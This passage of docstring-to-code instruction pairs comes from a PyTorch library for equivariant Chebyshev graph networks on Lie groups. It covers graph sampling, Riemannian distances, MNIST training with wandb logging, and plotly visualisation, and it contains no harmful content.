self.vertex_index.shape[0] +[INST] Return the total number of edges of the graph.. [/INST] def num_edges(self): + return self.edge_index.shape[1] +[INST] Returns the vertex's neighborhood.. [/INST] def neighborhood(self, vertex_index): + if not vertex_index in self.vertex_index: + raise ValueError(f"{vertex_index} is not a valid vertex index") + mask = self.edge_index[0] == vertex_index + return self.edge_index[1, mask], self.edge_weight[mask], self.edge_sqdist[mask] +[INST] Save graph's attributes.. [/INST] def save(self, path_to_graph): + os.makedirs(path_to_graph, exist_ok=True) + torch.save(self.vertex_index, os.path.join(path_to_graph, f"{self.hash_repr()}_vertex_index.pt")) + torch.save(self.edge_index, os.path.join(path_to_graph, f"{self.hash_repr()}_edge_index.pt")) + torch.save(self.edge_sqdist, os.path.join(path_to_graph, f"{self.hash_repr()}_edge_sqdist.pt")) + torch.save(self.edge_weight, os.path.join(path_to_graph, f"{self.hash_repr()}_edge_weight.pt")) + for vertex_attr in self.vertex_attributes: + torch.save(getattr(self, vertex_attr), os.path.join(path_to_graph, f"{self.hash_repr()}_{vertex_attr}.pt")) +[INST] Load graph's attributes.. [/INST] def load(self, path_to_graph): + self.vertex_index = torch.load(os.path.join(path_to_graph, f"{self.hash_repr()}_vertex_index.pt")) + self.edge_index = torch.load(os.path.join(path_to_graph, f"{self.hash_repr()}_edge_index.pt")) + self.edge_sqdist = torch.load(os.path.join(path_to_graph, f"{self.hash_repr()}_edge_sqdist.pt")) + self.edge_weight = torch.load(os.path.join(path_to_graph, f"{self.hash_repr()}_edge_weight.pt")) + for vertex_attr in self.vertex_attributes: + setattr(self, vertex_attr, torch.load(os.path.join(path_to_graph, f"{self.hash_repr()}_{vertex_attr}.pt"))) +[INST] Reinitialize random sub-graph vertices and edges' attributes.. [/INST] def reinit(self): + print("Reinit graph...") + if hasattr(self, "laplacian"): + del self.laplacian + self.vertex_index = self.graph.vertex_index.clone() + self.sub_vertex_index = self.vertex_index.clone() + for attr in self.graph.vertex_attributes: + setattr(self, attr, getattr(self.graph, attr)) + self.edge_index = self.graph.edge_index.clone() + self.edge_weight = self.graph.edge_weight.clone() + self.edge_sqdist = self.graph.edge_sqdist.clone() + print("Done!") +[INST] Randomly samples a given rate of edges from the original graph to generate a random sub-graph. 
+The graph is assumed to be undirected and the probability for an edge to be sampled is proportional +to its weight.. [/INST] def edges_sampling(self, rate): + print("Sample edges...") + mask = self.graph.edge_index[0] < self.graph.edge_index[1] + edge_index = self.graph.edge_index[..., mask] + edge_weight = self.graph.edge_weight[mask] + edge_sqdist = self.graph.edge_sqdist[mask] + num_samples = math.ceil(rate * edge_weight.nelement()) + sampled_edges = torch.multinomial(edge_weight, num_samples) + sampled_edge_index = edge_index[..., sampled_edges] + sampled_edge_weight = edge_weight[sampled_edges] + sampled_edge_sqdist = edge_sqdist[sampled_edges] + self.edge_index = torch.cat((sampled_edge_index.flip(0), sampled_edge_index), 1) + self.edge_weight = sampled_edge_weight.repeat(2) + self.edge_sqdist = sampled_edge_sqdist.repeat(2) + print("Done!") +[INST] Randomly samples a given rate of vertices from the original graph to generate a random subgraph. +All the vertices have the same probability of being sampled and, at the end of the algorithm, only edges +between sampled vertices remain. + +Vertex sampling is not compatible with pooling and unpooling operations for now. [/INST] def vertices_sampling(self, rate): + print("Sample vertices...") + num_samples = math.floor(rate * self.graph.num_vertices) + sampled_vertices, _ = torch.multinomial(torch.ones(self.graph.num_vertices), num_samples).sort() + self.vertex_index = torch.arange(num_samples) + self.sub_vertex_index = sampled_vertices.clone() + for attr in self.graph.vertex_attributes: + setattr(self, attr, getattr(self.graph, attr)[sampled_vertices]) + vertex_mapping = torch.empty(self.graph.num_vertices, dtype=torch.long).fill_(-1) + vertex_mapping[self.graph.vertex_index[sampled_vertices]] = self.vertex_index + edge_index = vertex_mapping[self.graph.edge_index] + mask = (edge_index[0] >= 0) & (edge_index[1] >= 0) + self.edge_index = edge_index[:, mask] + self.edge_weight = self.graph.edge_weight[mask] + self.edge_sqdist = self.graph.edge_sqdist[mask] + print("Done!") +[INST] Returns the cartesian position of the graph's vertices.. [/INST] def cartesian_pos(self, axis=None): + x, y, z = self.graph.cartesian_pos() + if axis == "x": + return x[self.sub_vertex_index] + if axis == "y": + return y[self.sub_vertex_index] + if axis == "z": + return z[self.sub_vertex_index] + return x[self.sub_vertex_index], y[self.sub_vertex_index], z[self.sub_vertex_index] +[INST] Returns the graph's vertices attributes.. [/INST] def vertex_attributes(self): + return self.graph.vertex_attributes +[INST] Return the riemannian squared distance between GL(3) group elements Gg and Gh according to the +riemannian metric Re.. [/INST] def riemannian_sqdist(self, Gg, Gh, Re): + return se2_riemannian_sqdist(Gg, Gh, Re) +[INST] Return the group elements of graph's vertices.. [/INST] def group_element(self): + return self.vertex_x, self.vertex_y, self.vertex_theta +[INST] Return the general linear group elements of graph's vertices.. [/INST] def general_linear_group_element(self): + return se2_matrix(self.vertex_x, self.vertex_y, self.vertex_theta) +[INST] Return the name of the group's dimensions.. [/INST] def group_dim(self): + return ["x", "y", "theta"] +[INST] Return the cartesian positions of the graph's vertices.. 
[/INST] def cartesian_pos(self, axis=None): + if axis is None: + return self.vertex_x, self.vertex_y, self.vertex_theta + if axis == "x": + return self.vertex_x + if axis == "y": + return self.vertex_y + if axis == "z": + return self.vertex_theta +[INST] Returns the graph's vertices attributes.. [/INST] def vertex_attributes(self): + return ("vertex_x", "vertex_y", "vertex_theta") +[INST] Return the riemannian squared distance between GL(3) group elements Gg and Gh according to the +riemannian metric Re.. [/INST] def riemannian_sqdist(self, Gg, Gh, Re): + return r2_riemannian_sqdist(Gg, Gh, Re) +[INST] Return the group elements of graph's vertices.. [/INST] def group_element(self): + return self.vertex_x, self.vertex_y +[INST] Return the general linear group elements of graph's vertices.. [/INST] def general_linear_group_element(self): + return r2_matrix(self.vertex_x, self.vertex_y) +[INST] Return the name of the group's dimensions.. [/INST] def group_dim(self): + return ["x", "y"] +[INST] Return the cartesian positions of the graph's vertices.. [/INST] def cartesian_pos(self, axis=None): + if axis is None: + return self.vertex_x, self.vertex_y, torch.zeros(self.num_vertices) + if axis == "x": + return self.vertex_x + if axis == "y": + return self.vertex_y + if axis == "z": + return torch.zeros(self.num_vertices) +[INST] Returns the graph's vertices attributes.. [/INST] def vertex_attributes(self): + return ("vertex_x", "vertex_y") +[INST] Return the riemannian squared distance between GL(3) group elements Gg and Gh according to the +riemannian metric Re.. [/INST] def riemannian_sqdist(self, Gg, Gh, Re): + return so3_riemannian_sqdist(Gg, Gh, Re) +[INST] Return the group elements of graph's vertices.. [/INST] def group_element(self): + return self.vertex_alpha, self.vertex_beta, self.vertex_gamma +[INST] Return the general linear group elements of graph's vertices.. [/INST] def general_linear_group_element(self): + return so3_matrix(self.vertex_alpha, self.vertex_beta, self.vertex_gamma) +[INST] Return the name of the group's dimensions.. [/INST] def group_dim(self): + return ["alpha", "beta", "gamma"] +[INST] Return the cartesian positions of the graph's vertices.. [/INST] def cartesian_pos(self, axis=None): + if not axis is None: + return (2 * math.pi + self.vertex_alpha) * betagamma2xyz(self.vertex_beta, self.vertex_gamma, axis) + x, y, z = betagamma2xyz(self.vertex_beta, self.vertex_gamma, axis) + x *= 2 * math.pi + self.vertex_alpha + y *= 2 * math.pi + self.vertex_alpha + z *= 2 * math.pi + self.vertex_alpha + return x, y, z +[INST] Returns the graph's vertices attributes.. [/INST] def vertex_attributes(self): + return ("vertex_alpha", "vertex_beta", "vertex_gamma") +[INST] Return the riemannian squared distance between GL(3) group elements Gg and Gh according to the +riemannian metric Re.. [/INST] def riemannian_sqdist(self, Gg, Gh, Re): + return s2_riemannian_sqdist(Gg, Gh, Re) +[INST] Return the group elements of graph's vertices.. [/INST] def group_element(self): + return self.vertex_beta, self.vertex_gamma +[INST] Return the general linear group elements of graph's vertices.. [/INST] def general_linear_group_element(self): + return s2_matrix(self.vertex_beta, self.vertex_gamma) +[INST] Return the name of the group's dimensions.. [/INST] def group_dim(self): + return ["beta", "gamma"] +[INST] Return the cartesian positions of the graph's vertices.. 
[/INST] def cartesian_pos(self, axis=None): + return betagamma2xyz(self.vertex_beta, self.vertex_gamma, axis) +[INST] Returns the graph's vertices attributes.. [/INST] def vertex_attributes(self): + return ("vertex_beta", "vertex_gamma") +[INST] Returns a new tensor corresponding to matrix formulation of the given input tensors representing +R(2) group elements.. [/INST] def r2_matrix(x, y, device=None): + G = torch.zeros((x.nelement(), 3, 3), device=device) + G[..., 0, 2] = x + G[..., 1, 2] = y + G[..., 0, 0] = 1.0 + G[..., 1, 1] = 1.0 + G[..., 2, 2] = 1.0 + return G +[INST] Returns a new tensor corresponding to matrix formulation of the given input tensors representing +SE(2) group elements.. [/INST] def se2_matrix(x, y, theta, device=None): + G = rotation_matrix(theta, "z", device=device) + G[:, 0, 2] = x + G[:, 1, 2] = y + return G +[INST] Returns a new tensor corresponding to the inverse of the group elements in matrix formulation.. [/INST] def r2_inverse(G): + return torch.inverse(G) +[INST] Returns a new tensor corresponding to the inverse of the group elements in matrix formulation.. [/INST] def se2_inverse(G): + return torch.inverse(G) +[INST] Returns three new tensors corresponding to x, y and theta attributes of the group elements specified by the +se2 group elements in matrix formulation.. [/INST] def se2_element(G): + return G[..., 0, 2], G[..., 1, 2], torch.atan2(G[..., 1, 0], G[..., 0, 0]) +[INST] Returns a new tensor containing the riemannian logarithm of the group elements in matrix formulation.. [/INST] def r2_log(G): + x, y = r2_element(G) + c1 = x + c2 = y + c3 = torch.zeros_like(c1) + c = torch.stack((c1, c2, c3), dim=-1).unsqueeze(2) + return c +[INST] Returns a new tensor containing the riemannian logarithm of the group elements in matrix formulation.. [/INST] def se2_log(G): + x, y, theta = se2_element(G) + c1 = theta / 2 * (y + x * torch.cos(theta / 2) / torch.sin(theta / 2)) + c2 = -theta / 2 * (x + y * torch.cos(theta / 2) / torch.sin(theta / 2)) + c3 = theta.clone() + mask = theta == 0.0 + c1[mask] = x[mask] + c2[mask] = y[mask] + c = torch.stack((c1, c2, c3), dim=-1).unsqueeze(2) + return c +[INST] Return the squared riemannian distances between group elements in matrix formulation.. [/INST] def r2_riemannian_sqdist(Gg, Gh, Re): + G = torch.matmul(r2_inverse(Gg), Gh) + return weighted_norm(r2_log(G), Re) +[INST] Returns the squared riemannian distances between group elements in matrix formulation.. [/INST] def se2_riemannian_sqdist(Gg, Gh, Re): + G = torch.matmul(se2_inverse(Gg), Gh) + x, y, theta = se2_element(G) + sqdist1 = weighted_norm(se2_log(se2_matrix(x, y, theta)), Re) + sqdist2 = weighted_norm(se2_log(se2_matrix(x, y, theta - math.pi)), Re) + sqdist3 = weighted_norm(se2_log(se2_matrix(x, y, theta + math.pi)), Re) + sqdist, _ = torch.stack((sqdist1, sqdist2, sqdist3)).min(dim=0) + return sqdist +[INST] Trains a model on MNIST and evaluates its performance on MNIST, Flip-MNIST and 90Rot-MNIST.. 
[/INST] def train(config=None): + with wandb.init(config=config, project="cheblienet"): + config = wandb.config + wandb.log({"dataset": "mnist"}) + wandb.log(vars(args)) + device = torch.device("cuda" if torch.cuda.is_available() and args.cuda else "cpu") + if args.anisotropic: + graph = SE2GEGraph( + [28, 28, config.ntheta], + K=config.K, + sigmas=(1.0, config.eps, config.xi), + path_to_graph=args.path_to_graph, + ) + else: + graph = R2GEGraph( + [28, 28, config.ntheta], + K=config.K, + sigmas=(1.0, config.eps, config.xi), + path_to_graph=args.path_to_graph, + ) + sub_graph = RandomSubGraph(graph) + model = WideResSE2GEChebNet( + in_channels=1, + out_channels=10, + kernel_size=config.kernel_size, + graph_lvl0=sub_graph, + res_depth=args.res_depth, + widen_factor=args.widen_factor, + ).to(device) + wandb.log({"capacity": capacity(model)}) + optimizer = Adam(model.parameters(), lr=args.lr) + train_loader, _ = get_train_val_loaders( + "mnist", + num_layers=config.ntheta, + batch_size=args.batch_size, + val_ratio=0.0, + path_to_data=args.path_to_data, + ) + (classic_test_loader, rotated_test_loader, flipped_test_loader,) = get_equiv_test_loaders( + "mnist", num_layers=config.ntheta, batch_size=args.batch_size, path_to_data=args.path_to_data + ) + trainer = create_supervised_trainer( + graph=sub_graph, + model=model, + optimizer=optimizer, + loss_fn=nll_loss, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Training").attach(trainer) + classic_metrics = {"classic_test_accuracy": Accuracy(), "classic_test_loss": Loss(nll_loss)} + rotated_metrics = {"rotated_test_accuracy": Accuracy(), "rotated_test_loss": Loss(nll_loss)} + flipped_metrics = {"flipped_test_accuracy": Accuracy(), "flipped_test_loss": Loss(nll_loss)} + classic_evaluator = create_supervised_evaluator( + graph=sub_graph, + model=model, + metrics=classic_metrics, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Evaluation").attach(classic_evaluator) + rotated_evaluator = create_supervised_evaluator( + graph=sub_graph, + model=model, + metrics=rotated_metrics, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Evaluation").attach(rotated_evaluator) + flipped_evaluator = create_supervised_evaluator( + graph=sub_graph, + model=model, + metrics=flipped_metrics, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Evaluation").attach(flipped_evaluator) + if args.sample_edges or args.sample_vertices: + trainer.add_event_handler( + Events.ITERATION_STARTED, + sub_graph.reinit, + ) + trainer.add_event_handler( + Events.EPOCH_COMPLETED, + sub_graph.reinit, + ) + if args.sample_vertices: + trainer.add_event_handler( + Events.ITERATION_STARTED, + sub_graph.vertices_sampling, + args.vertices_rate, + ) + if args.sample_edges: + trainer.add_event_handler( + Events.ITERATION_STARTED, + sub_graph.edges_sampling, + args.edges_rate, + ) + if args.save_models: + gst = lambda *_: trainer.state.epoch + handler = Checkpoint( + {"model": model}, DiskSaver(args.path_to_model, create_dir=True), n_saved=5, global_step_transform=gst + ) + trainer.add_event_handler(Events.EPOCH_COMPLETED, handler) + trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, classic_evaluator, classic_test_loader) + trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, rotated_evaluator, rotated_test_loader) + trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, flipped_evaluator, flipped_test_loader) + 
trainer.run(train_loader, max_epochs=args.max_epochs) +[INST] Visualize graph's vertices.. [/INST] def visualize_graph(graph): + df = pd.DataFrame({"vertex_index": graph.vertex_index}) + df["X"], df["Y"], df["Z"] = graph.cartesian_pos() + for attr in graph.vertex_attributes: + df[attr] = getattr(graph, attr) + fig = px.scatter_3d(df, x="X", y="Y", z="Z", hover_data=list(graph.vertex_attributes) + ["vertex_index"]) + fig.update_traces( + marker={"size": 5, "color": "crimson", "line": {"width": 2, "color": "DarkSlateGrey"}, "opacity": 1.0}, + ) + fig.update_layout(width=500, height=500, margin={"l": 0, "r": 0, "t": 0, "b": 0}) + fig.show() +[INST] Visualize a signal on the graph's vertices.. [/INST] def visualize_graph_signal(graph, signal): + df = pd.DataFrame({"vertex_index": graph.vertex_index}) + df["X"], df["Y"], df["Z"] = graph.cartesian_pos() + df["signal"] = signal + for attr in graph.vertex_attributes: + df[attr] = getattr(graph, attr) + fig = px.scatter_3d( + df, + x="X", + y="Y", + z="Z", + color="signal", + hover_data=list(graph.vertex_attributes) + ["signal", "vertex_index"], + color_continuous_scale="PiYG", + color_continuous_midpoint=0.0, + ) + fig.update_traces( + marker={"size": 5, "opacity": 1.0}, + ) + fig.update_layout( + width=600, + height=500, + margin=dict(l=0, r=0, t=0, b=50), + ) + fig.show() +[INST] Visualize the graph neighborhood of the given vertex.. [/INST] def visualize_graph_neighborhood(graph, vertex_index): + df1 = pd.DataFrame() + df1["vertex_index"], df1["weight"], df1["sqdist"] = graph.neighborhood(vertex_index) + df2 = pd.DataFrame({"vertex_index": graph.vertex_index}) + df2["X"], df2["Y"], df2["Z"] = graph.cartesian_pos() + for attr in graph.vertex_attributes: + df2[attr] = getattr(graph, attr) + df = pd.merge(df1, df2, on="vertex_index", how="right") + df.weight.fillna(0.0, inplace=True) + fig = px.scatter_3d( + df, + x="X", + y="Y", + z="Z", + color="weight", + hover_data=list(graph.vertex_attributes) + ["weight", "sqdist", "vertex_index"], + color_continuous_scale="PuRd", + range_color=[0, 1], + ) + fig.update_traces( + marker={"size": 5, "opacity": 1.0}, + ) + fig.update_layout(width=600, height=500, margin={"l": 0, "r": 0, "t": 0, "b": 0}) + fig.show() +[INST] Returns a new tensor whose elements correspond to the modulo with offset of the elements of the input.. [/INST] def mod(input, n, d=0.0): + return (input - d) % n + d +[INST] Returns a new tensor whose elements correspond to the cardinal sine (sinc) of the elements of the input.. [/INST] def sinc(input): + output = torch.sin(input) / input + output[input == 0.0] = 1.0 + return output +[INST] Returns a new tensor whose elements are those of the input rounded to n decimal places.. [/INST] def round(input, n_digits=0): + return torch.round(input * 10 ** n_digits) / (10 ** n_digits)
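+[INST] Illustrative usage sketch, not taken from the original codebase: wrap angles into the interval [-pi, pi) with the mod helper defined above; the function name wrap_to_pi and the chosen interval are assumptions made for the example.. [/INST] def wrap_to_pi(angles): + # mod(input, n, d) computes (input - d) % n + d, so with n = 2 * pi and offset d = -pi + # any real-valued tensor of angles is mapped into the half-open interval [-pi, pi). + # Assumes `import math` and `import torch`, as elsewhere in this file. + return mod(angles, 2 * math.pi, d=-math.pi)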